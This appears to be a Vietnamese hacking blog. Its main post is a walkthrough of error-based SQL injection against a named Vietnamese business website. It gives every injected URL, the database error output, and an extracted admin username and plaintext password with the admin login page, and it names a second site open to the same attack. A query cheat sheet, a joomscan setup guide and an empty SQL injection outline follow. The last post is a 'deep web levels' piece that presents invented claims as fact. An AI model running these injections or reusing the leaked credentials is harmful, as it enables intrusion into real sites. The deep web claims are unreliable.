15 thg 8, 2015

sqli aspx

sqli aspx

Victim: http://quangcaovinasun.com.vn 

Bước 1: Check link lỗi


Đối với site aspx, ta thêm dấu ‘ cuối đường link có các ký tự dạng ID=, Sp=…. Nếu thấy site xuất hiện lỗi: 

Unclosed quotation mark after the character string ''

Chứng tỏ site dính lỗi SQLI.
Ví dụ: http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42’ 

[​IMG]







Bước 2: Truy vấn tên các table


http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables))-- - 



Xuất hiện thông tin tên table thứ nhất: “tbl_DangNhap”. 


Conversion failed when converting the nvarchar value 'tbl_DangNhap' to data type int.

Tiếp tục truy vấn:

http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap')))-- - 


Conversion failed when converting the nvarchar value 'tbl_DiaChi' to data type int.


[​IMG]



Tiếp tục,

http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap','tbl_DiaChi' )))-- - 


Conversion failed when converting the nvarchar value 'tbl_DoiTac' to data type int.

Làm tương tự cho tới khi xuất hiện table user chứa thông tin username và password. Ở site này table chứa thông admin đăng nhập của admin là table đầu tiên: Tbl_DangNhap


Bước 3 : Truy vấn tên các columns 


Như thông tin khai thác được ở trên. Table chứa thông tin username và password chính là table: tbl_DangNhap. Chính vì vậy ta sẽ khai thác table này.


http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') ))-- - 


Conversion failed when converting the nvarchar value 'ID' to data type int.


[​IMG]


http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID')))-- - 



Conversion failed when converting the nvarchar value 'TenDN' to data type int.

http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID','TenDN')))-- - 


Conversion failed when converting the nvarchar value 'Matkhau' to data type int.


Bước 4: Khai Thác thông tin username và password 


- Thông tin username:

http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 TenDN from tbl_DangNhap))-- - 


Conversion failed when converting the nvarchar value 'loimv' to data type int. 

- Thông tin password 


http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 Matkhau from tbl_DangNhap))--- 


Conversion failed when converting the nvarchar value 'maihoanglinh@' to data type int 
- Hoặc get cả username và password


http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 TenDN%2b'/'%2bMatkhau from tbl_DangNhap))-- - 


Conversion failed when converting the nvarchar value 'loimv/maihoanglinh@' to data type int


[​IMG]



Bước 5: Tìm link admin và đăng nhâp 

Sử dụng tool havij hoặc web admin finder, đã được giới thiệu ở bài 2:

http://ducdung08clc.blogspot.com/2012/03/v-behaviorurldefaultvmlo.html 

Ta được link admin: 

http://quangcaovinasun.com.vn/admin/Default.aspx 

admin: loimv

password: maihoanglinh@


[​IMG]



Site khai thác tương tự:

http://www.sacotour.vn/Chi-tiet-tour.aspx?idtour=88



Kết Luận Các Query SQLI Trong Aspx Cần Lưu Ý


1- Get the version:

and 1=convert(int,@@version)-- -

2- Get Server Name

and 1=convert(int,@@servername)-- -

3- Get data base name:

and 1=convert(int,db_name())-- -

4- Get system user

and 1=convert(int,system_user) -- -

5- Get table thứ nhất

and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -

6- Get table thứ 2:

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))-- -

7- Get table thứ 3 :

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))-- -

8- Get đến table user để lấy thông tin đăng nhập của admin


10 - Get column thứ nhất từ table chứa admin :

and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))-- -

11- Get column thứ nhất từ table chứa admin :

and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")
and column_name not in ("FIRST-COLUMNS-HERE")))-- -

12- Get cho hết các columns cần lấy thông tin


13- Xuất ra thông tin username và password

and 1=convert(int,(select top 1 column-name-1%2b’/’%2bcolumn-name-2 from TABLE-NAME-HERE))-- -
 Xem chi tiết »
1
Nhãn:

13 thg 8, 2014

hướng dẫn cài OWASP joomla vulnerability cho windows

hướng dẫn cài OWASP joomla vulnerability cho windows


1. Cài đặt môi trường Perl cho windows
Download Link: http://www.activestate.com/activeperl/downloads 
2.Tải OWASP Joomla Vulnerability Scanner và unzip ở nơi bạn mún
Download Link: http://sourceforge.net/projects/joomscan/files/latest/download
3.Cài đặt
Các bạn mở command lên và cd đến thư mục chứa "OWASP Joomla Vulnerability Scanner" mà các bạn đã unzip lúc nảy.
Ví dụ ổ C , thư mục joomscan thì ta gõ lệnh sau:
cd \joomscan và enter
Tiếp sau gõ từng lệnh:
cpan
install local::lib
install App::cpanminus
exit
cpanm
cpanm install -f Switch
4.Sử dụng
Ta cũng sẽ cd tới thư mục chứa  "OWASP Joomla Vulnerability Scanner" và ta gõ:
 joomscan.pl -u http://site.com/  và enter
Xong..chỉ đơn giản vậy thôi,chúc các bạn thành công :))

Nguồn sưu tầm by Lãng Tử Kids
 Xem chi tiết »
0
Nhãn:

7 thg 8, 2014

Cơ bản về Sql injection

Cơ bản về Sql injection


1.Mục đích tấn công

2.Cơ chế tấn công

*Ví dụ:


3.Phương thức tấn công

4.Demo

5.Cách phòng chống
update sau nhé :))




Nguồn sưu tầm by Lãng Tử Kids.

 Xem chi tiết »
0
Nhãn:

25 thg 5, 2014

no image

Các Cấp Độ Tại Deep Web



Level 1 – Surface Web

This level is still accessible through normal means, but contains “darker” websites, such as Reddit.

Lv 1- Web bề nổi(bên ngoài,phía ngoài)- Surface Web

Tầng này vẫn có thể truy cập vào theo (bởi, bằng) những cách thông thường, nhưng bao gồm cả những web đen (hơn) như Reddit.



Level 2 – Bergie Web

This level is the last one normally accessible: all levels that follow this one have to be accessed with a proxy, Tor or by modifyig your hardware. In this level you can find some “underground” but still indexed websites, such as 4chan.

Lv 2- Web vô thừa nhận – Bergie Web(Bergies Kẻ lang thang vô gia cư(khẩu ngữ, để chỉ kẻ không nhà cửa,lang thang hết chốn này đến chốn khác.)

Tầng này là tầng cuối cùng có thể truy cập 1 cách thông thường, toàn bộ những tầng tiếp theo đều phải truy cập thông qua 1 proxy. Dùng tor hoặc là điều chỉnh phần cứng máy bạn.  Trong tầng này bạn có thể tìm thấy 1 số trang web ngầm(bí mật)  nhưng vẫn là những trang web đã được liệt ra như:  4chan

Level 3 – Deep Web

The first part of this level has to be accessed with a proxy. It contains CP, gore, hacking websites… Here begins the Deep Web. The second part of this level is only accessible through Tor, and contains more sensible information.



Lv3- Web ẩn(Deep Web)

Phần đầu của tầng này được truy cập qua proxy. Nó bao gồm cp(Child porn), gore(clip kinh dị: chặt đầu con tin, nội tạng v.v….), hacking websites….. Và đây Web ẩn, phần thứ 2 của tầng này chỉ có thể truy cập qua Tor, và nó bao gồm những thông tin nhạy cảm hơn.

Level 4 – Charter Web

This level is also divided in two parts. The first can be accessed through Tor. Things such as drug and human traficking, banned movies and books and black markets exist there. The second part can be accessed through a hardware modification: a “Closed Shell System”. Here, shit becomes serious. This part of the Charter Web contains hardcore CP, experimental hardware information (“Gadolinium Gallium Garnet Quantum Electronic Processors”…), but also darker information, such as the “Law of 13″, World War 2 experiments, and even the location of Atlantis.



- một hình ảnh tôi tìm được ở phần này - không có nguồn gốc ghi chú

Lv4- Charter Web

Tầng này cũng được chia làm 2 phần. Phần đầu được truy cập qua Tor, những thứ như ma túy, buôn bán người (human trafficking) , phim và sách bị xóa(cấm,như bạo lực, máu me,dị giáo  v.v…) và chợ đen. Phần 2 truy cập thông qua việc sửa đổi phần cứng: 1 “Closed Shell System” (đại loại là chỉnh sao cho máy mình bảo mật hơn nữa mới vào típ tầng này). Rắc rối là từ đây, phần này bao gồm hardcore CP(child porn), thông tin về các thí nghiệm vk hạng nặng(hay là máy móc ?) (Xử  lí điện lượng tử GGG,wiki nó dịch cái đó là 1 loại tinh thể tổng hợp nhân tạo trong nhóm garnet ), law of 13(thirteen events the Illuminati will impose on humanity before creating a central world government, đây là 1 tổ chức tội phạm/chính trị nguy hiểm chúng sẽ giáng 13 sự kiện đánh vào nhân loại nhằm lập lại 1 trật tự thế giới mới) những thí nghiệm thế chiến thứ 2, và cả vị trí của Atlantis.



- tôi sẽ kể rõ hơn về hội kín và law of 13 trong những bài tới.

Level 5 – Marianas Web

To gain access to this part of the Deep Web, a special hardware is necessary: some argue that you need an old computer and OS, or solve quantum computation mechanics. According to the picture, a “Polymeric Falcighol Derivation” is needed. Beyond the Charter Web exists 80% of the Internet. What the Marianas Web contains is unknown. It is rumored to contain government databases and secret information on several conspiration theories, paranormal events and secret experiments (Hollow Earth, secret societies…). This is very unlikely and has yet to be proven by someone who really gained access to this part of the Internet.

Lv5- Marianas Web

Để có thể vào được tầng này của Deep Web, cần phải có 1 hệ thống đặc biệt: Một số đề nghị bạn cần 1 cái máy tính cũ với 1 hệ điều hành, hay giải quyet vấn đề cơ học lượng tử máy tính (quantum computation mechanics). Cái polymeric – thì tôi bó tay, và ở đây có các dữ liệu mật của chính phủ, các tư liệu bị cấm lưu trữ, các thông tin mật, các hoạt động tâm linh quái đản của các hội mật, cũng như những lễ hiến tế, hiến sinh……v.v.v.



Level 6 – ?

What this level contains is unknown. It is apparently an intermediary between the Marianas Web and the Levels 7 and 8. According to an Anon on the 4chan imageboard, leading hackers have found ways even beyond the 5th layer ; at this point, you start getting attention you don’t want; your life is in danger. Quantum computing is needed to get past the 6th layer.

To those who do not know what  Quantum Computing is, it is  computing that relies on quantum physics by taking advantage of certain quantum physics properties of atoms or nuclei that allow them to work together as quantum bits, or qubits, to be the computer’s processor and memory. By interacting with each other while being isolated from the external environment, qubits can perform certain calculations exponentially faster than conventional computers. The reason as to why Quantum computing is needed is because of the vast amount of information in these extreme lower depths of the net.  It is very confusing as to what is actually contained in this level because there is not actual proof that I have found, but I believe that quantum computing is required solely to navigate the massive amounts of data in this level.

Đa phần mọi người khó có thể nào vượt qua được Level 4 để đến level 5 . Nếu vượt qua được hệ kiểm soát của Chính phủ ở trên, thì bạn sẽ phải nắm rõ về nguyên lý Quantum computer ( hay tổ chức một cuộc tấn công quy mô rộng ) để đến Level 6 - Diversion . Đây xem như hàng rào lạc hướng, ngăn chặn các cá nhân tiếp cận Level 7 và 8.

Thời điểm này, là lúc bạn không thể quay lại.



Level 7 – The Fog/Virus Soup

This level is apparently where the “big players” are. It is pumped full of loads of code, to try to prevent people getting deeper. In this level, everyone is fighting to keep others out because of the value of the systems below.

The best way to describe Level 7 would but a war zone.  Where it is every man for themselves , where everyone who “made” it here is trying to get to the 8th level and preventing other people from getting there.

Level 7 - tên là " The fog " hay " Virus Soup " là nơi các cao thủ, các thiên tài tập trung, nơi chúng sát phạt nhau, phá hoại công khai lẫn lén lút – dạng như – hoa sơn luận kiếm. Lý do là vì đây là nơi tập trung các đơn hàng mua bán giá trị cao ( vài chục triệu đến vài tỷ Dollar ). Cho nên các thông tin sẽ được mã hóa và " kèm khuyến mãi " là các virus, nhằm mục đích ngăn chặn - thộp cổ ai thích xía vào chuyện kẻ khác. Và hơn tất cả là bảo vệ Level 8.

Level 8 – The Primarch System

Level 8 is impossible to access directly. The primarch system is what controls the Internet. No government or organization has control of it. Nobody even knows what it is. This system is an anomaly discovered in the 2000′s. It is unresponsive, but sends out unalterable commands to the entire net, randomly. The entire 7th Level is people trying to gain access to Level 8 and stopping others from getting there. Level 8 is thought to be separated by a “level 17 quantum t.r.001 level function lock”, which is virtually impossible for our computers to break.

Level 8 - " Primarch System " là nơi cuối cùng, được phát hiện vào năm 2000 sau lần rà soát dữ liệu tập trung ( Massive Deep Web Scan ). Thực tế, không ai biết cái của nợ gì dưới đó, không biết nó chứa thông tin gì hay nó thật sự hoạt động. Tầng 7 phía trên, ngoài nơi buôn bán còn là nơi mà tất cả mọi người đang ra sức phá vỡ hệ mã hóa của Primarch ( hệ Quantum t.r 0001 – không dịch được, không biết – dù đã cố gắng tìm kiếm.)

- Theo tất cả tài liệu, tôi có thể tìm được – tầng 8 đã là giới hạn của vực sâu internet, nhưng ai biết được, đã có thể khai phá đến tầng 7 thì chắc có thể mở được sâu hơn.

- Trong những ngày lặn ngụp trong DW tôi vẫn băn khoăn khá nhiều về các hội kín, và dường như tôi vẫn chưa thể đi xa hơn xuống các vực khác. Tuy nhiên, qua một số nguồn, người, trung gian, tôi vẫn có được một ít thông tin. ( Tôi chỉ là anh thợ chữ, xài máy tính với hệ điều hành lậu, chỉ có phần mềm diệt virus lậu, bạn không thể đòi hỏi tôi hơn được – những gì tôi đang dành thời gian viết cho bạn là hoàn toàn phi lợi nhuận – và tôi không muốn một ngày đẹp trời xác mình nằm trong thùng rác đâu.)

Nguồn: lãng tử kids
 Xem chi tiết »
0
Nhãn: